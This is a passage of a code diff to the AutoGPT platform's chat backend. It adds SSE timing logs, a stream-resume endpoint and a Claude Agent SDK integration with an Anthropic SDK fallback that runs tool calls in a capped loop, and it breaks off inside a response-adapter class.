+            "output": self.output,
+        }
+        return f"data: {json_dumps(data)}\n\n"
+

 # ========== Other ==========

@@ -148,6 +195,18 @@ class StreamError(StreamBaseResponse):
        default=None, description="Additional error details"
    )

+    def to_sse(self) -> str:
+        """Convert to SSE format, only emitting fields required by AI SDK protocol.
+
+        The AI SDK uses z.strictObject({type, errorText}) which rejects
+        any extra fields like `code` or `details`.
+        """
+        data = {
+            "type": self.type.value,
+            "errorText": self.errorText,
+        }
+        return f"data: {json_dumps(data)}\n\n"
+

 class StreamHeartbeat(StreamBaseResponse):
    """Heartbeat to keep SSE connection alive during long-running operations.
--- a/autogpt_platform/backend/backend/api/features/chat/routes.py
+++ b/autogpt_platform/backend/backend/api/features/chat/routes.py
@@ -1,12 +1,13 @@
 """Chat API routes for chat session management and streaming via SSE."""

+import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
 from typing import Annotated

 from autogpt_libs import auth
-from fastapi import APIRouter, Depends, Header, HTTPException, Query, Security
+from fastapi import APIRouter, Depends, Header, HTTPException, Query, Response, Security
 from fastapi.responses import StreamingResponse
 from pydantic import BaseModel

@@ -16,8 +17,39 @@ from . import service as chat_service
 from . import stream_registry
 from .completion_handler import process_operation_failure, process_operation_success
 from .config import ChatConfig
-from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
-from .response_model import StreamFinish, StreamHeartbeat, StreamStart
+from .model import (
+    ChatMessage,
+    ChatSession,
+    append_and_save_message,
+    create_chat_session,
+    get_chat_session,
+    get_user_sessions,
+)
+from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
+from .sdk import service as sdk_service
+from .tools.models import (
+    AgentDetailsResponse,
+    AgentOutputResponse,
+    AgentPreviewResponse,
+    AgentSavedResponse,
+    AgentsFoundResponse,
+    BlockListResponse,
+    BlockOutputResponse,
+    ClarificationNeededResponse,
+    DocPageResponse,
+    DocSearchResultsResponse,
+    ErrorResponse,
+    ExecutionStartedResponse,
+    InputValidationErrorResponse,
+    NeedLoginResponse,
+    NoResultsResponse,
+    OperationInProgressResponse,
+    OperationPendingResponse,
+    OperationStartedResponse,
+    SetupRequirementsResponse,
+    UnderstandingUpdatedResponse,
+)
+from .tracking import track_user_message

 config = ChatConfig()

@@ -209,6 +241,10 @@ async def get_session(
    active_task, last_message_id = await stream_registry.get_active_task_for_session(
        session_id, user_id
    )
+    logger.info(
+        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
+        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
+    )
    if active_task:
        # Filter out the in-progress assistant message from the session response.
        # The client will receive the complete assistant response through the SSE
@@ -266,12 +302,54 @@ async def stream_chat_post(

    """
    import asyncio
+    import time

+    stream_start_time = time.perf_counter()
+    log_meta = {"component": "ChatStream", "session_id": session_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] stream_chat_post STARTED, session={session_id}, "
+        f"user={user_id}, message_len={len(request.message)}",
+        extra={"json_fields": log_meta},
+    )
    session = await _validate_and_get_session(session_id, user_id)
+    logger.info(
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": (time.perf_counter() - stream_start_time) * 1000,
+            }
+        },
+    )
+
+    # Atomically append user message to session BEFORE creating task to avoid
+    # race condition where GET_SESSION sees task as "running" but message isn't
+    # saved yet.  append_and_save_message re-fetches inside a lock to prevent
+    # message loss from concurrent requests.
+    if request.message:
+        message = ChatMessage(
+            role="user" if request.is_user_message else "assistant",
+            content=request.message,
+        )
+        if request.is_user_message:
+            track_user_message(
+                user_id=user_id,
+                session_id=session_id,
+                message_length=len(request.message),
+            )
+        logger.info(f"[STREAM] Saving user message to session {session_id}")
+        session = await append_and_save_message(session_id, message)
+        logger.info(f"[STREAM] User message saved for session {session_id}")

    # Create a task in the stream registry for reconnection support
    task_id = str(uuid_module.uuid4())
    operation_id = str(uuid_module.uuid4())
+    log_meta["task_id"] = task_id
+
+    task_create_start = time.perf_counter()
    await stream_registry.create_task(
        task_id=task_id,
        session_id=session_id,
@@ -280,40 +358,147 @@ async def stream_chat_post(
        tool_name="chat",
        operation_id=operation_id,
    )
+    logger.info(
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": (time.perf_counter() - task_create_start) * 1000,
+            }
+        },
+    )

    # Background task that runs the AI generation independently of SSE connection
    async def run_ai_generation():
+        import time as time_module
+
+        gen_start_time = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] run_ai_generation STARTED, task={task_id}, session={session_id}, user={user_id}",
+            extra={"json_fields": log_meta},
+        )
+        first_chunk_time, ttfc = None, None
+        chunk_count = 0
        try:
            # Emit a start event with task_id for reconnection
            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
            await stream_registry.publish_chunk(task_id, start_chunk)
+            logger.info(
+                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
+                        * 1000,
+                    }
+                },
+            )

-            async for chunk in chat_service.stream_chat_completion(
+            # Choose service based on configuration
+            use_sdk = config.use_claude_agent_sdk
+            stream_fn = (
+                sdk_service.stream_chat_completion_sdk
+                if use_sdk
+                else chat_service.stream_chat_completion
+            )
+            logger.info(
+                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
+                extra={"json_fields": log_meta},
+            )
+            # Pass message=None since we already added it to the session above
+            async for chunk in stream_fn(
                session_id,
-                request.message,
+                None,  # Message already in session
                is_user_message=request.is_user_message,
                user_id=user_id,
-                session=session,  # Pass pre-fetched session to avoid double-fetch
+                session=session,  # Pass session with message already added
                context=request.context,
            ):
+                # Skip duplicate StreamStart — we already published one above
+                if isinstance(chunk, StreamStart):
+                    continue
+                chunk_count += 1
+                if first_chunk_time is None:
+                    first_chunk_time = time_module.perf_counter()
+                    ttfc = first_chunk_time - gen_start_time
+                    logger.info(
+                        f"[TIMING] FIRST AI CHUNK at {ttfc:.2f}s, type={type(chunk).__name__}",
+                        extra={
+                            "json_fields": {
+                                **log_meta,
+                                "chunk_type": type(chunk).__name__,
+                                "time_to_first_chunk_ms": ttfc * 1000,
+                            }
+                        },
+                    )
                # Write to Redis (subscribers will receive via XREAD)
                await stream_registry.publish_chunk(task_id, chunk)

-            # Mark task as completed
+            gen_end_time = time_module.perf_counter()
+            total_time = (gen_end_time - gen_start_time) * 1000
+            logger.info(
+                f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
+                f"task={task_id}, session={session_id}, "
+                f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "time_to_first_chunk_ms": (
+                            ttfc * 1000 if ttfc is not None else None
+                        ),
+                        "n_chunks": chunk_count,
+                    }
+                },
+            )
            await stream_registry.mark_task_completed(task_id, "completed")
        except Exception as e:
+            elapsed = time_module.perf_counter() - gen_start_time
            logger.error(
-                f"Error in background AI generation for session {session_id}: {e}"
+                f"[TIMING] run_ai_generation ERROR after {elapsed:.2f}s: {e}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": elapsed * 1000,
+                        "error": str(e),
+                    }
+                },
            )
+            # Publish a StreamError so the frontend can display an error message
+            try:
+                await stream_registry.publish_chunk(
+                    task_id,
+                    StreamError(
+                        errorText="An error occurred. Please try again.",
+                        code="stream_error",
+                    ),
+                )
+            except Exception:
+                pass  # Best-effort; mark_task_completed will publish StreamFinish
            await stream_registry.mark_task_completed(task_id, "failed")

    # Start the AI generation in a background task
    bg_task = asyncio.create_task(run_ai_generation())
    await stream_registry.set_task_asyncio_task(task_id, bg_task)
+    setup_time = (time.perf_counter() - stream_start_time) * 1000
+    logger.info(
+        f"[TIMING] Background task started, setup={setup_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
+    )

    # SSE endpoint that subscribes to the task's stream
    async def event_generator() -> AsyncGenerator[str, None]:
+        import time as time_module
+
+        event_gen_start = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] event_generator STARTED, task={task_id}, session={session_id}, "
+            f"user={user_id}",
+            extra={"json_fields": log_meta},
+        )
        subscriber_queue = None
+        first_chunk_yielded = False
+        chunks_yielded = 0
        try:
            # Subscribe to the task stream (this replays existing messages + live updates)
            subscriber_queue = await stream_registry.subscribe_to_task(
@@ -328,24 +513,78 @@ async def stream_chat_post(
                return

            # Read from the subscriber queue and yield to SSE
+            logger.info(
+                "[TIMING] Starting to read from subscriber_queue",
+                extra={"json_fields": log_meta},
+            )
            while True:
                try:
                    chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
+                    chunks_yielded += 1
+
+                    if not first_chunk_yielded:
+                        first_chunk_yielded = True
+                        elapsed = time_module.perf_counter() - event_gen_start
+                        logger.info(
+                            f"[TIMING] FIRST CHUNK from queue at {elapsed:.2f}s, "
+                            f"type={type(chunk).__name__}",
+                            extra={
+                                "json_fields": {
+                                    **log_meta,
+                                    "chunk_type": type(chunk).__name__,
+                                    "elapsed_ms": elapsed * 1000,
+                                }
+                            },
+                        )
+
                    yield chunk.to_sse()

                    # Check for finish signal
                    if isinstance(chunk, StreamFinish):
+                        total_time = time_module.perf_counter() - event_gen_start
+                        logger.info(
+                            f"[TIMING] StreamFinish received in {total_time:.2f}s; "
+                            f"n_chunks={chunks_yielded}",
+                            extra={
+                                "json_fields": {
+                                    **log_meta,
+                                    "chunks_yielded": chunks_yielded,
+                                    "total_time_ms": total_time * 1000,
+                                }
+                            },
+                        )
                        break
                except asyncio.TimeoutError:
-                    # Send heartbeat to keep connection alive
                    yield StreamHeartbeat().to_sse()

        except GeneratorExit:
+            logger.info(
+                f"[TIMING] GeneratorExit (client disconnected), chunks={chunks_yielded}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "chunks_yielded": chunks_yielded,
+                        "reason": "client_disconnect",
+                    }
+                },
+            )
            pass  # Client disconnected - background task continues
        except Exception as e:
-            logger.error(f"Error in SSE stream for task {task_id}: {e}")
+            elapsed = (time_module.perf_counter() - event_gen_start) * 1000
+            logger.error(
+                f"[TIMING] event_generator ERROR after {elapsed:.1f}ms: {e}",
+                extra={
+                    "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
+                },
+            )
+            # Surface error to frontend so it doesn't appear stuck
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="stream_error",
+            ).to_sse()
+            yield StreamFinish().to_sse()
        finally:
-            # Unsubscribe when client disconnects or stream ends to prevent resource leak
+            # Unsubscribe when client disconnects or stream ends
            if subscriber_queue is not None:
                try:
                    await stream_registry.unsubscribe_from_task(
@@ -357,6 +596,18 @@ async def stream_chat_post(
                        exc_info=True,
                    )
            # AI SDK protocol termination - always yield even if unsubscribe fails
+            total_time = time_module.perf_counter() - event_gen_start
+            logger.info(
+                f"[TIMING] event_generator FINISHED in {total_time:.2f}s; "
+                f"task={task_id}, session={session_id}, n_chunks={chunks_yielded}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time * 1000,
+                        "chunks_yielded": chunks_yielded,
+                    }
+                },
+            )
            yield "data: [DONE]\n\n"

    return StreamingResponse(
@@ -374,63 +625,90 @@ async def stream_chat_post(
 @router.get(
    "/sessions/{session_id}/stream",
 )
-async def stream_chat_get(
+async def resume_session_stream(
    session_id: str,
-    message: Annotated[str, Query(min_length=1, max_length=10000)],
    user_id: str | None = Depends(auth.get_user_id),
-    is_user_message: bool = Query(default=True),
 ):
    """
-    Stream chat responses for a session (GET - legacy endpoint).
+    Resume an active stream for a session.

-    Streams the AI/completion responses in real time over Server-Sent Events (SSE), including:
-      - Text fragments as they are generated
-      - Tool call UI elements (if invoked)
-      - Tool execution results
+    Called by the AI SDK's ``useChat(resume: true)`` on page load.
+    Checks for an active (in-progress) task on the session and either replays
+    the full SSE stream or returns 204 No Content if nothing is running.

    Args:
-        session_id: The chat session identifier to associate with the streamed messages.
-        message: The user's new message to process.
+        session_id: The chat session identifier.
        user_id: Optional authenticated user ID.
-        is_user_message: Whether the message is a user message.
-    Returns:
-        StreamingResponse: SSE-formatted response chunks.

+    Returns:
+        StreamingResponse (SSE) when an active stream exists,
+        or 204 No Content when there is nothing to resume.
    """
-    session = await _validate_and_get_session(session_id, user_id)
+    import asyncio
+
+    active_task, _last_id = await stream_registry.get_active_task_for_session(
+        session_id, user_id
+    )
+
+    if not active_task:
+        return Response(status_code=204)
+
+    subscriber_queue = await stream_registry.subscribe_to_task(
+        task_id=active_task.task_id,
+        user_id=user_id,
+        last_message_id="0-0",  # Full replay so useChat rebuilds the message
+    )
+
+    if subscriber_queue is None:
+        return Response(status_code=204)

    async def event_generator() -> AsyncGenerator[str, None]:
        chunk_count = 0
        first_chunk_type: str | None = None
-        async for chunk in chat_service.stream_chat_completion(
-            session_id,
-            message,
-            is_user_message=is_user_message,
-            user_id=user_id,
-            session=session,  # Pass pre-fetched session to avoid double-fetch
-        ):
-            if chunk_count < 3:
-                logger.info(
-                    "Chat stream chunk",
-                    extra={
-                        "session_id": session_id,
-                        "chunk_type": str(chunk.type),
-                    },
+        try:
+            while True:
+                try:
+                    chunk = await asyncio.wait_for(subscriber_queue.get(), timeout=30.0)
+                    if chunk_count < 3:
+                        logger.info(
+                            "Resume stream chunk",
+                            extra={
+                                "session_id": session_id,
+                                "chunk_type": str(chunk.type),
+                            },
+                        )
+                    if not first_chunk_type:
+                        first_chunk_type = str(chunk.type)
+                    chunk_count += 1
+                    yield chunk.to_sse()
+
+                    if isinstance(chunk, StreamFinish):
+                        break
+                except asyncio.TimeoutError:
+                    yield StreamHeartbeat().to_sse()
+        except GeneratorExit:
+            pass
+        except Exception as e:
+            logger.error(f"Error in resume stream for session {session_id}: {e}")
+        finally:
+            try:
+                await stream_registry.unsubscribe_from_task(
+                    active_task.task_id, subscriber_queue
                )
-            if not first_chunk_type:
-                first_chunk_type = str(chunk.type)
-            chunk_count += 1
-            yield chunk.to_sse()
-        logger.info(
-            "Chat stream completed",
-            extra={
-                "session_id": session_id,
-                "chunk_count": chunk_count,
-                "first_chunk_type": first_chunk_type,
-            },
-        )
-        # AI SDK protocol termination
-        yield "data: [DONE]\n\n"
+            except Exception as unsub_err:
+                logger.error(
+                    f"Error unsubscribing from task {active_task.task_id}: {unsub_err}",
+                    exc_info=True,
+                )
+            logger.info(
+                "Resume stream completed",
+                extra={
+                    "session_id": session_id,
+                    "n_chunks": chunk_count,
+                    "first_chunk_type": first_chunk_type,
+                },
+            )
+            yield "data: [DONE]\n\n"

    return StreamingResponse(
        event_generator(),
@@ -438,8 +716,8 @@ async def stream_chat_get(
        headers={
            "Cache-Control": "no-cache",
            "Connection": "keep-alive",
-            "X-Accel-Buffering": "no",  # Disable nginx buffering
-            "x-vercel-ai-ui-message-stream": "v1",  # AI SDK protocol header
+            "X-Accel-Buffering": "no",
+            "x-vercel-ai-ui-message-stream": "v1",
        },
    )

@@ -550,8 +828,6 @@ async def stream_task(
        )

    async def event_generator() -> AsyncGenerator[str, None]:
-        import asyncio
-
        heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
        try:
            while True:
@@ -751,3 +1027,42 @@ async def health_check() -> dict:
        "service": "chat",
        "version": "0.1.0",
    }
+
+
+# ========== Schema Export (for OpenAPI / Orval codegen) ==========
+
+ToolResponseUnion = (
+    AgentsFoundResponse
+    | NoResultsResponse
+    | AgentDetailsResponse
+    | SetupRequirementsResponse
+    | ExecutionStartedResponse
+    | NeedLoginResponse
+    | ErrorResponse
+    | InputValidationErrorResponse
+    | AgentOutputResponse
+    | UnderstandingUpdatedResponse
+    | AgentPreviewResponse
+    | AgentSavedResponse
+    | ClarificationNeededResponse
+    | BlockListResponse
+    | BlockOutputResponse
+    | DocSearchResultsResponse
+    | DocPageResponse
+    | OperationStartedResponse
+    | OperationPendingResponse
+    | OperationInProgressResponse
+)
+
+
+@router.get(
+    "/schema/tool-responses",
+    response_model=ToolResponseUnion,
+    include_in_schema=True,
+    summary="[Dummy] Tool response type export for codegen",
+    description="This endpoint is not meant to be called. It exists solely to "
+    "expose tool response models in the OpenAPI schema for frontend codegen.",
+)
+async def _tool_response_schema() -> ToolResponseUnion:  # type: ignore[return]
+    """Never called at runtime. Exists only so Orval generates TS types."""
+    raise HTTPException(status_code=501, detail="Schema-only endpoint")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/__init__.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/__init__.py
@@ -0,0 +1,14 @@
+"""Claude Agent SDK integration for CoPilot.
+
+This module provides the integration layer between the Claude Agent SDK
+and the existing CoPilot tool system, enabling drop-in replacement of
+the current LLM orchestration with the battle-tested Claude Agent SDK.
+"""
+
+from .service import stream_chat_completion_sdk
+from .tool_adapter import create_copilot_mcp_server
+
+__all__ = [
+    "stream_chat_completion_sdk",
+    "create_copilot_mcp_server",
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
@@ -0,0 +1,363 @@
+"""Anthropic SDK fallback implementation.
+
+This module provides the fallback streaming implementation using the Anthropic SDK
+directly when the Claude Agent SDK is not available.
+"""
+
+import json
+import logging
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any, cast
+
+from ..config import ChatConfig
+from ..model import ChatMessage, ChatSession
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from .tool_adapter import get_tool_definitions, get_tool_handlers
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Maximum tool-call iterations before stopping to prevent infinite loops
+_MAX_TOOL_ITERATIONS = 10
+
+
+async def stream_with_anthropic(
+    session: ChatSession,
+    system_prompt: str,
+    text_block_id: str,
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream a chat completion via the Anthropic SDK with tool-calling support.
+
+    Runs at most ``_MAX_TOOL_ITERATIONS`` model turns. After each turn that
+    stops with ``tool_use``, the requested tools are executed and their
+    results are fed back to the model for the next turn.
+
+    Assistant and tool messages produced here are appended to
+    ``session.messages`` for persistence. The assistant message carrying the
+    tool calls is always stored *before* the tool results that answer it, so
+    the history can be replayed in a valid order on the next request.
+
+    Args:
+        session: Chat session whose messages seed the request and receive the
+            messages produced during this call.
+        system_prompt: System prompt sent with every model turn.
+        text_block_id: ID used for the first streamed text block. A fresh
+            UUID is generated for the text that follows each tool-use turn.
+
+    Yields:
+        Stream events (text start/delta/end, tool input/output, usage, error).
+        The generator always ends with ``StreamFinish``, so the caller should
+        NOT yield an additional one.
+    """
+    import anthropic
+
+    # Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
+    # with config.base_url for OpenRouter routing — matching the non-SDK path.
+    api_key = config.api_key
+    if not api_key:
+        yield StreamError(
+            errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
+            code="config_error",
+        )
+        yield StreamFinish()
+        return
+
+    # Build kwargs for the Anthropic client — use base_url if configured
+    client_kwargs: dict[str, Any] = {"api_key": api_key}
+    if config.base_url:
+        # Strip /v1 suffix — Anthropic SDK adds its own version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        client_kwargs["base_url"] = base
+
+    client = anthropic.AsyncAnthropic(**client_kwargs)
+    tool_definitions = get_tool_definitions()
+    tool_handlers = get_tool_handlers()
+
+    anthropic_tools = [
+        {
+            "name": t["name"],
+            "description": t["description"],
+            "input_schema": t["inputSchema"],
+        }
+        for t in tool_definitions
+    ]
+
+    anthropic_messages = _convert_session_to_anthropic(session)
+
+    # The request must end with a user turn; add a nudge when it does not.
+    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
+        anthropic_messages.append(
+            {"role": "user", "content": "Continue with the task."}
+        )
+
+    has_started_text = False
+    accumulated_text = ""
+    accumulated_tool_calls: list[dict[str, Any]] = []
+
+    for _ in range(_MAX_TOOL_ITERATIONS):
+        try:
+            async with client.messages.stream(
+                # Drop any "provider/" prefix; split() returns the whole
+                # string unchanged when there is no "/" in the model name.
+                model=config.model.split("/")[-1],
+                max_tokens=4096,
+                system=system_prompt,
+                messages=cast(Any, anthropic_messages),
+                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
+            ) as stream:
+                async for event in stream:
+                    if event.type == "content_block_start":
+                        block = event.content_block
+                        if hasattr(block, "type"):
+                            if block.type == "text" and not has_started_text:
+                                yield StreamTextStart(id=text_block_id)
+                                has_started_text = True
+                            elif block.type == "tool_use":
+                                yield StreamToolInputStart(
+                                    toolCallId=block.id, toolName=block.name
+                                )
+
+                    elif event.type == "content_block_delta":
+                        delta = event.delta
+                        if hasattr(delta, "type") and delta.type == "text_delta":
+                            accumulated_text += delta.text
+                            yield StreamTextDelta(id=text_block_id, delta=delta.text)
+
+                final_message = await stream.get_final_message()
+
+                if final_message.stop_reason == "tool_use":
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+                        has_started_text = False
+                        # Text after the tool call goes into a new block.
+                        text_block_id = str(uuid.uuid4())
+
+                    tool_results = []
+                    assistant_content: list[dict[str, Any]] = []
+                    # Tool results are buffered so they can be persisted
+                    # AFTER the assistant message that requested them.
+                    tool_messages: list[ChatMessage] = []
+
+                    for block in final_message.content:
+                        if block.type == "text":
+                            assistant_content.append(
+                                {"type": "text", "text": block.text}
+                            )
+                        elif block.type == "tool_use":
+                            # Non-dict inputs are reported as an empty object.
+                            tool_input = (
+                                block.input if isinstance(block.input, dict) else {}
+                            )
+
+                            assistant_content.append(
+                                {
+                                    "type": "tool_use",
+                                    "id": block.id,
+                                    "name": block.name,
+                                    "input": block.input,
+                                }
+                            )
+
+                            # Track tool call for session persistence
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": block.id,
+                                    "type": "function",
+                                    "function": {
+                                        "name": block.name,
+                                        "arguments": json.dumps(tool_input),
+                                    },
+                                }
+                            )
+
+                            yield StreamToolInputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                input=tool_input,
+                            )
+
+                            output, is_error = await _execute_tool(
+                                block.name, block.input, tool_handlers
+                            )
+
+                            yield StreamToolOutputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                output=output,
+                                success=not is_error,
+                            )
+
+                            tool_messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=output,
+                                    tool_call_id=block.id,
+                                )
+                            )
+
+                            tool_results.append(
+                                {
+                                    "type": "tool_result",
+                                    "tool_use_id": block.id,
+                                    "content": output,
+                                    "is_error": is_error,
+                                }
+                            )
+
+                    # Save assistant message with tool calls to session first,
+                    # then the tool results that answer those calls.
+                    session.messages.append(
+                        ChatMessage(
+                            role="assistant",
+                            content=accumulated_text or None,
+                            tool_calls=(
+                                accumulated_tool_calls
+                                if accumulated_tool_calls
+                                else None
+                            ),
+                        )
+                    )
+                    session.messages.extend(tool_messages)
+
+                    # Reset for next iteration
+                    accumulated_text = ""
+                    accumulated_tool_calls = []
+
+                    anthropic_messages.append(
+                        {"role": "assistant", "content": assistant_content}
+                    )
+                    anthropic_messages.append({"role": "user", "content": tool_results})
+                    continue
+
+                else:
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+
+                    # Save final assistant response to session
+                    if accumulated_text:
+                        session.messages.append(
+                            ChatMessage(role="assistant", content=accumulated_text)
+                        )
+
+                    yield StreamUsage(
+                        promptTokens=final_message.usage.input_tokens,
+                        completionTokens=final_message.usage.output_tokens,
+                        totalTokens=final_message.usage.input_tokens
+                        + final_message.usage.output_tokens,
+                    )
+                    yield StreamFinish()
+                    return
+
+        except Exception as e:
+            # Details go to the log only; the client gets a generic message.
+            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="anthropic_error",
+            )
+            yield StreamFinish()
+            return
+
+    # Every iteration ended in tool_use: stop rather than loop forever.
+    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
+    yield StreamFinish()
+
+
+def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
+    """Translate the session history into Anthropic message dicts.
+
+    User messages become plain-text user turns, tool messages become user
+    turns holding a single ``tool_result`` block, and assistant messages
+    become a list of ``text`` / ``tool_use`` blocks. Assistant messages with
+    neither text nor tool calls, and messages with any other role, are
+    dropped. Adjacent same-role messages are merged before returning.
+    """
+    converted: list[dict[str, Any]] = []
+
+    for entry in session.messages:
+        role = entry.role
+
+        if role == "user":
+            converted.append({"role": "user", "content": entry.content or ""})
+            continue
+
+        if role == "tool":
+            result_block = {
+                "type": "tool_result",
+                "tool_use_id": entry.tool_call_id or "",
+                "content": entry.content or "",
+            }
+            converted.append({"role": "user", "content": [result_block]})
+            continue
+
+        if role != "assistant":
+            continue
+
+        blocks: list[dict[str, Any]] = []
+        if entry.content:
+            blocks.append({"type": "text", "text": entry.content})
+
+        for call in entry.tool_calls or []:
+            fn = call.get("function", {})
+            arguments = fn.get("arguments", {})
+            # Arguments stored as a JSON string are decoded; undecodable
+            # strings fall back to an empty object.
+            if isinstance(arguments, str):
+                try:
+                    arguments = json.loads(arguments)
+                except json.JSONDecodeError:
+                    arguments = {}
+            blocks.append(
+                {
+                    "type": "tool_use",
+                    "id": call.get("id", str(uuid.uuid4())),
+                    "name": fn.get("name", ""),
+                    "input": arguments,
+                }
+            )
+
+        # Skip empty assistant messages
+        if blocks:
+            converted.append({"role": "assistant", "content": blocks})
+
+    # Anthropic requires alternating roles, so collapse same-role neighbours.
+    return _merge_consecutive_roles(converted)
+
+
+def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Merge consecutive messages that share the same role.
+
+    Anthropic API requires alternating user/assistant roles. When two
+    neighbouring messages have the same role, their contents are normalized
+    to block lists (a string becomes one ``text`` block) and concatenated.
+
+    The input is not modified: each kept message is shallow-copied before
+    its ``content`` is replaced, and merged content is always a new list.
+
+    Args:
+        messages: Message dicts with at least ``role`` and ``content`` keys.
+
+    Returns:
+        A new list in which no two adjacent messages share a role.
+    """
+
+    def _as_blocks(content: Any) -> list[Any]:
+        """Normalize message content to list-of-blocks form."""
+        if isinstance(content, str):
+            return [{"type": "text", "text": content}]
+        if isinstance(content, list):
+            return content
+        return [content]
+
+    merged: list[dict[str, Any]] = []
+    for msg in messages:
+        if merged and merged[-1]["role"] == msg["role"]:
+            # "+" builds a fresh list, so neither source list is mutated.
+            merged[-1]["content"] = _as_blocks(merged[-1]["content"]) + _as_blocks(
+                msg["content"]
+            )
+        else:
+            # Copy so later merges never rewrite the caller's dict.
+            merged.append(dict(msg))
+
+    return merged
+
+
+async def _execute_tool(
+    tool_name: str, tool_input: Any, handlers: dict[str, Any]
+) -> tuple[str, bool]:
+    """Run the handler registered for ``tool_name``.
+
+    Returns:
+        ``(output, is_error)``. The output is the ``text`` of the first item
+        in the handler result's ``content`` list, or an empty string when
+        there is no such item. An unknown tool or an exception raised by the
+        handler is reported as an error with a descriptive message.
+    """
+    handler = handlers.get(tool_name)
+    if not handler:
+        return f"Unknown tool: {tool_name}", True
+
+    try:
+        result = await handler(tool_input)
+
+        # Only the first content item is inspected; anything that is not a
+        # non-empty list headed by a dict yields an empty output.
+        text = ""
+        blocks = result.get("content") or []
+        if isinstance(blocks, list) and blocks:
+            head = blocks[0]
+            if isinstance(head, dict):
+                text = head.get("text", "")
+
+        return text, result.get("isError", False)
+    except Exception as exc:
+        return f"Error: {str(exc)}", True
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
@@ -0,0 +1,212 @@
+"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+This module provides the adapter layer that converts streaming messages from
+the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
+the frontend expects.
+"""
+
+import json
+import logging
+import uuid
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    Message,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from backend.api.features.chat.sdk.tool_adapter import (
+    MCP_TOOL_PREFIX,
+    pop_pending_tool_output,
+)
+
+logger = logging.getLogger(__name__)
+
+
+class SDKResponseAdapter:
+    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+    This class maintains state during a streaming session to properly track
+    text blocks, tool calls, and message lifecycle. One instance is meant to
+    be fed every SDK message of a single run, in order, via
+    :meth:`convert_message`.
+    """
+
+    def __init__(self, message_id: str | None = None):
+        """Create an adapter.
+
+        Args:
+            message_id: ID reported in ``StreamStart``; a random UUID is
+                generated when omitted.
+        """
+        self.message_id = message_id or str(uuid.uuid4())
+        # ID of the text block currently being streamed (or about to be).
+        self.text_block_id = str(uuid.uuid4())
+        self.has_started_text = False
